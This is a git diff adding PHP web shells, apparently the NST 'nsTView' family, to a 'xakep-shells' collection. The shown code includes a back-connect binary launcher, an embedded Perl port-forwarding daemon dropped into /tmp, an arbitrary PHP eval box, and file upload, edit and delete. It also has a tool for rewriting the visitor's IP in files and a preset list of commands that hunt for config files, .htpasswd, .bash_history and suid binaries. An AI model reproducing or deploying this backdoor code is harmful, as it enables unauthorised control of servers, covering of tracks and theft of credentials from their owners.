+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## �������� ��� ������� (1-��, 0-���)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"������ ������� ����� ��� ����������: \$!\";
+
+print \"�������� ���������� �����.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"�������� ��������� accept: \$!\n\";
+                next;
+        }
+
+        printf(\"����� ������: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"���������� ��������� fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## ����� �������
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ������ �������, ��������� �����.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: ������ �������� �� \$o->{'tohost'}, ���� \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: ������� �������� �� %s, ���� %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: �������� �������� ��� ����� \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: �������� ����.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: ������ Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: ���� ������ �� �������.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: ������ ��� ���������� ������ �������: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: ������ ������������.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: ������: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: ���� ������.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: ���������� ������� ������: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: ��������� ������������.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: ������: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: ���������� \$len ����.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: ������ ����������.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: ���������� ��������� ������: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: ���������� \$len ���� �������.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: ������ ����������..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: ���������� ��������� ������: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/xakep-shells/PHP/nstview.php.php.txt b/xakep-shells/PHP/nstview.php.php.txt
new file mode 100644
index 0000000..4ecf4bb
--- /dev/null
+++ b/xakep-shells/PHP/nstview.php.php.txt
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
